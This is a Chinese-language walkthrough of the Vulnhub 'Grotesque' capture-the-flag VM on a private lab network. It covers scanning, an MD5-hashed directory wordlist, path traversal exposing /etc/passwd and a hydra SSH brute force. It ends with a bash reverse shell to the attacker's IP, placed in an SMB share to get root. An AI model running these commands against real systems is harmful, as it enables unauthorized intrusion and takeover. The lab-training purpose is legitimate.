Vulnhub Grotesque靶机详细解题过程
Grotesque
识别目标主机IP地址
─(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.103.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:6e:ae:83 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.102 08:00:27:3c:13:24 1 60 PCS Systemtechnik GmbH
利用攻击机Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.102
NMAP 扫描
──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.102 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 00:37 EDT
Nmap scan report for bogon (192.168.56.102)
Host is up (0.00073s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:3C:13:24 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.97 seconds
经NMAP工具扫描,目标主机有两个开放端口: 22(ssh服务)以及80(http)服务,操作系统类型为Debian, apache版本为2.4.38
信息收集以及漏洞挖掘
首先运行于目标主机的SSH版本没有明显可利用的漏洞。因此接下来需要该阶段需要将聚焦于HTTP服务
访问目标主机的HTTP服务:
┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ curl http://192.168.56.102
<!DOCTYPE html>
<html>
<body>
<style>
body {
background-image: url('gigachad.png');
background-repeat: no-repeat;
background-size: cover; }
@font-face {
font-family: Segoe;
src: url('segoeui.ttf');
}
.mainfo {
text-align: center;
border: 1px solid #000000;
font-family: 'Segoe';
padding: 5px;
background-color: #ffffff;
margin-top: 300px;
}
.emoji {
width: 32px;
}
</style>
<div class="mainfo">
<br>my child,<br>
<br>why don't you look your <a href="atlasg.jpg">atlas<a>?<br>
<br>it will lighten your way.<br><br>
</body>
</html>
该站点不存在robots.txt文件
──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ curl http://192.168.56.102/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.102 Port 80</address>
</body></html>
首页源代码中有一个图片的链接,将其下载到本地
─(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ wget http://192.168.56.102/atlasg.jpg
--2022-10-24 00:58:40-- http://192.168.56.102/atlasg.jpg
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2513334 (2.4M) [image/jpeg]
Saving to: ‘atlasg.jpg’
atlasg.jpg 100%[===========================================>] 2.40M --.-KB/s in 0.04s
2022-10-24 00:58:40 (68.2 MB/s) - ‘atlasg.jpg’ saved [2513334/2513334]
┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ ls
atlasg.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ steghide extract -sf atlasg.jpg
Enter passphrase:
发现有口令保护,尝试用stegseek破解:
─(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ stegseek atlasg.jpg /usr/share/wordlists/rockyou.txt -xf output
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.78% (133.1 MB)
[!] error: Could not find a valid passphrase.
破解失败,这个方向只能是暂停,先看下目标有哪些目录:
──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ gobuster dir -u http://192.168.56.102 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.102
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/10/24 01:02:02 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
===============================================================
2022/10/24 01:02:45 Finished
===============================================================
访问gobuster所发现的目录,无果。
查看其他人的攻击过程,是上面下载的图片放大看有m d 字样,因此提示应该是MD5加密(哈哈,所以需要仔细并放大图片进行查看)
因此需要生成MD5加密后的字典文件,然后用gobuster等工具扫描
─(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ for i in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt ); do echo $i | md5sum >> dirmd5.txt;done
编写一个Python程序处理一下上面得到的文件(上面的文件,每行后面有个'-'以及空格),这里比较有意思的是我用strip函数删除'-'好像不成功,后来改用replace函数
path = 'dirmd5.txt'
f = open(path, 'r')
g = open('dirwordlist.txt', 'w')
while True:
line = f.readline()
# print(line)
# break
if len(line) == 0:
break
gline = line.replace('-','').strip()
print(gline)
g.write(gline+'\n')
f.close()
g.close()
──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ gobuster dir -u http://192.168.56.102 -w dirwordlist.txt -z -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.102
[+] Method: GET
[+] Threads: 10
[+] Wordlist: dirwordlist.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,txt,sh,php
[+] Timeout: 10s
===============================================================
2022/10/24 01:54:13 Starting gobuster in directory enumeration mode
===============================================================
/f66b22bf020334b04c7d0d3eb5010391.php (Status: 200) [Size: 0]
发现了一个文件:f66b22bf020334b04c7d0d3eb5010391.php
访问该文件,没有任何响应,但也没有出错,可能是需要参数
(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ curl http://192.168.56.102/f66b22bf020334b04c7d0d3eb5010391.php
需要对该文件的参数进行FUZZ模糊测试
$ wfuzz -c -u 'http://192.168.56.102/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/big.txt --hh 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.102/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../etc/passwd
Total requests: 20476
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000014759: 200 27 L 40 W 1457 Ch "purpose"
可以先运行wfuzz(不带hh选项),看一下结果的规律,然后再运行wfuzz 带上--hh选项
发现了purpose参数,验证一下该参数:
─(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ curl http://192.168.56.102/f66b22bf020334b04c7d0d3eb5010391.php?purpose=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
freddie:x:1000:1000:freddie,,,:/home/freddie:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
发现了用户freddie, 然后用LFI本地文件包含漏洞,看一下是否有ssh的私钥文件
─(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ curl http://192.168.56.102/f66b22bf020334b04c7d0d3eb5010391.php?purpose=../../../../../home/freddie/.ssh/id_rsa
没有得到相应的响应。但此时已经得到了目标主机的用户名 freddie,现尝试利用hydra工具暴力破解freddie的ssh密码
(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ hydra -l freddie -P /usr/share/wordlists/rockyou.txt 192.168.56.102 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-24 03:02:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.102:22/
[STATUS] 149.00 tries/min, 149 tries in 00:01h, 14344251 to do in 1604:31h, 15 active
[STATUS] 105.33 tries/min, 316 tries in 00:03h, 14344084 to do in 2269:39h, 15 active
[STATUS] 98.71 tries/min, 691 tries in 00:07h, 14343709 to do in 2421:46h, 15 active
[STATUS] 96.60 tries/min, 1449 tries in 00:15h, 14342951 to do in 2474:38h, 15 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
用自带的rockyou.txt字典没有破解成功,参考其他人,联想到之前所产生的MD5字典文件,用该文件重新进行爆破
─(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ hydra -l freddie -P dirwordlist.txt 192.168.56.102 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-24 03:22:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 207698 login tries (l:1/p:207698), ~12982 tries per task
[DATA] attacking ssh://192.168.56.102:22/
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 207572 to do in 27:02h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 207404 to do in 35:03h, 14 active
[STATUS] 92.29 tries/min, 646 tries in 00:07h, 207054 to do in 37:24h, 14 active
[STATUS] 92.13 tries/min, 1382 tries in 00:15h, 206318 to do in 37:20h, 14 active
[22][ssh] host: 192.168.56.102 login: freddie password: 61a4e3e60c063d1e472dd780f64e6cad
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-24 03:47:10
┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
长时间的等待,终于破解成功:
Exploit
──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ ssh freddie@192.168.56.102
The authenticity of host '192.168.56.102 (192.168.56.102)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.102' (ED25519) to the list of known hosts.
freddie@192.168.56.102's password:
Linux grotesque 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
freddie@grotesque:~$ id
uid=1000(freddie) gid=1000(freddie) groups=1000(freddie),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
freddie@grotesque:~$ pwd
/home/freddie
freddie@grotesque:~$ cd /home
freddie@grotesque:/home$ cd /tmp
将LinEnum.sh脚本上传至目标主机,并执行
─(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ cp ~/Tools/linenum/LinEnum.sh .
┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.102 - - [24/Oct/2022 03:50:54] "GET /LinEnum.sh HTTP/1.1" 200 -
freddie@grotesque:/tmp$ chmod +x LinEnum.sh
freddie@grotesque:/tmp$ ./LinEnum.sh
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982
[-] Debug Info
[+] Thorough tests = Disabled
Scan started at:
Mon 24 Oct 2022 02:14:35 AM CDT
### SYSTEM ##############################################
[-] Kernel information:
Linux grotesque 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
[-] Kernel information (continued):
Linux version 4.19.0-13-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.160-2 (2020-11-28)
没有有价值的信息。
freddie@grotesque:/tmp$ ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 192.168.56.255:137 0.0.0.0:*
udp UNCONN 0 0 192.168.56.102:137 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:137 0.0.0.0:*
udp UNCONN 0 0 192.168.56.255:138 0.0.0.0:*
udp UNCONN 0 0 192.168.56.102:138 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:138 0.0.0.0:*
tcp LISTEN 0 50 0.0.0.0:445 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 50 0.0.0.0:139 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 50 [::]:445 [::]:*
tcp LISTEN 0 50 [::]:139 [::]:*
tcp LISTEN 0 128 *:80 *:*
freddie@grotesque:/tmp$
发现445端口是开放的,但是前面在NMAP扫描时并没有发现,说明不对外提供服务
reddie@grotesque:/tmp$ smbclient -L 127.0.0.1
Unable to initialize messaging context
Enter WORKGROUP\freddie's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
grotesque Disk grotesque
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP GROTESQUE
freddie@grotesque:/tmp$ smbclient //127.0.0.1/grotesque
Unable to initialize messaging context
Enter WORKGROUP\freddie's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 11 09:24:27 2021
.. D 0 Sun Jul 11 09:20:30 2021
1942736 blocks of size 1024. 674116 blocks available
smb: \>
(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Vulnhub/Grotesque]
└─$ cat shell.php
#!/bin/bash
bash -i >& /dev/tcp/192.168.56.101/8080 0>&1
freddie@grotesque:/tmp$ wget http://192.168.56.101:80/shell.sh
--2022-10-24 02:46:08-- http://192.168.56.101/shell.sh
Connecting to 192.168.56.101:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 57 [text/x-sh]
Saving to: ‘shell.sh’
shell.sh 100%[===========================================>] 57 --.-KB/s in 0s
2022-10-24 02:46:08 (1.18 MB/s) - ‘shell.sh’ saved [57/57]
freddie@grotesque:/tmp$ ls
LinEnum.sh systemd-private-663e4bd685f2461aa04259b7d07ebea9-apache2.service-bAb6Z1
shell.sh systemd-private-663e4bd685f2461aa04259b7d07ebea9-systemd-timesyncd.service-UiDNAD
freddie@grotesque:/tmp$ chmod +x shell.sh
freddie@grotesque:/tmp$
在目标上利用SMB协议将shell.sh"上传"至共享目录,从而拿到root权限
smb: \> put shell.sh
putting file shell.sh as \shell.sh (18.6 kb/s) (average 18.6 kb/s)
smb: \> ls
. D 0 Mon Oct 24 02:46:49 2022
.. D 0 Sun Jul 11 09:20:30 2021
shell.sh A 57 Mon Oct 24 02:46:49 2022
1942736 blocks of size 1024. 674112 blocks available
smb: \>
└─$ sudo nc -nlvp 8080
[sudo] password for kali:
listening on [any] 8080 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 39298
bash: cannot set terminal process group (4569): Inappropriate ioctl for device
bash: no job control in this shell
root@grotesque:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@grotesque:~#
成功拿到root权限
STRIVE FOR PROGRESS,NOT FOR PERFECTION
